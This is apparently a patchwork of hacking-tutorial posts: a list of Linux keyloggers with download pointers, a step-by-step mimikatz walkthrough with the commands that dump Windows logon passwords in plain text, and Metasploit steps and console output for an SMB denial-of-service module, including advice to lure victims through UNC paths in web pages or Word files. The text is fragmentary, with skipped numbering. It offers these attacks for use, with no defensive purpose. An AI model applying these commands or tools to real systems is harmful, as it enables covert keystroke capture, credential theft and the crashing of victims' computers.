LKL is a user space keylogger that runs under linux--x86/arch. LKL sniffs and logs everything passes trought the hardware keyboard port (0x60).

Download From here

(2)Log Key:-
logkeys is a linux keylogger. It is no more advanced than other available linux
keyloggers, notably lkl and uberkey, but is a bit newer, more up to date, it doesn't unreliably repeat keys and it shouldn't crash your X. All in all, it just seems to work. It relies on event interface of the Linux input subsystem.

Once completely set, it logs all common character and function keys, while also
being fully aware of Shift and Altr key modifiers.

Download from here

ttyrpld is a kit to log any traffic and actions which go through any of your Kernel's tty
devices. In common-term language, this is a Keylogger

Download from here

(4)uber key :-
Download link

Download link

(6)Simple keylogger Python script:-
Download here
Today we are going to use new tools which can be use to get windows password in plain text. It works on both 32 bit & 64 bit O.S.  

In this tutorial we are going to use this tool in local computer , But in next we will use this tool to get passwords of Remote P.C.  using  metasploit.

(1)Download     tool  from here
(2)After Extracting open win32 or x64 depending upon your O.S.
(3)Run as Administration mimikatz.
(4)Now type privilege::debug  , this command check if mimikitz running with system privilege
(5)In order to get credential in plain text type this commandsekurlsa::logonPaswords full

(6)You can see credential in plain text.
Next we will use metasploit to get credential of Remote P.C.
This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB  server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word 
document otherwise.


(2)use dos/windows/smb/ms10_006_negotiate_response_loop

(3)show options

(4)set SRVHOST I.P. of local machine 



[*] Starting the malicious SMB service...

[*] To trigger, the vulnerable client should try to access: \\I.P.\Shared\Anything

[*] Server started.

If the system that accessed that location is vulnerable, it will immediately freeze. To get out of that state, restart the system